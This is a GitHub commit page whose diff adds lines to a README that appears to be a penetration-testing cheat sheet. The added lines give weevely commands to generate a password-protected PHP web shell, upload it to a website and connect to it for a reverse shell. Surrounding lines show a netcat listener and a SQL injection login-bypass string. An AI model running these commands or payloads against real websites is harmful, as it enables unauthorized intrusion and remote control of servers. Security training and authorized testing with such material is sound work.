Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
infovault-Ytube authored Sep 11, 2022
1 parent 8f010b3 commit 7491425
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -238,6 +238,14 @@ run
```console
nc -vnl -p 1234
```

> [Weevely](https://www.kali.org/tools/weevely/) : Generate PHP Reverse shell
```console
weevely generate password123 /home/error.php
# Upload the above error.php to website and use the below cmd to get reverse shell

weevely http://domain.com/error.php password123
```

### SQL Injection
> Login bypass with [' or 1=1 --](https://github.com/mrsuman2002/SQL-Injection-Authentication-Bypass-Cheat-Sheet/blob/master/SQL%20Injection%20Cheat%20Sheet.txt)

0 comments on commit 7491425

Please sign in to comment.